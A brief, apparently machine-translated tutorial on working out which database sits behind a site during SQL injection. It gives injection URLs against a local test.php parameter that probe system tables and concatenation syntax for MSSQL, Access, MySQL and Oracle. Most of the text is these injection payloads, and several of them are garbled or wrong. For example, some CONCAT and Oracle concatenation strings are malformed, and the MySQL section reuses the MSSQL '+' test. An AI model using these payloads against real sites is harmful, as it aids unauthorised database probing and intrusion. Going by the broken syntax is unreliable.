Three ways to judge the type of background database in the process of sql injection
Judgment of backend database type:
First, through the error information returned on the page, in general, the error report on the page will show what type of database it is. I won't say much about it here.
Second, judge by the unique data tables of each database:
1. Mssql database
Http://127.0.0.1/test.php?id=1 and (select count (*) from sysobjects) > 0 and 1
2. Access database
Http://127.0.0.1/test.php?id=1 and (select count (*) from msysobjects) > 0 and 1
3. Mysql database (mysql version 5.0 or above)
Http://127.0.0.1/test.php?id=1 and (select count (*) from information_schema.TABLES) > 0 and 1
4. Oracle database
Http://127.0.0.1/test.php?id=1 and (select count (*) from sys.user_tables) > 0 and 1
Third, judge the database type by the unique connectors of each database:
1. Mssql database
Http://127.0.0.1/test.php?id=1 and'1' +'1' = '11'
2. Mysql database
Http://127.0.0.1/test.php?id=1 and'1' +'1' = '11'
Http://127.0.0.1/test.php?id=1 and CONCAT ('1m, 1') = '11'
3. Oracle database
Http://127.0.0.1/test.php?id=1 and'1' | | '1thanks' 11'
Http://127.0.0.1/test.php?id=1 and CONCAT ('1m, 1') = '11'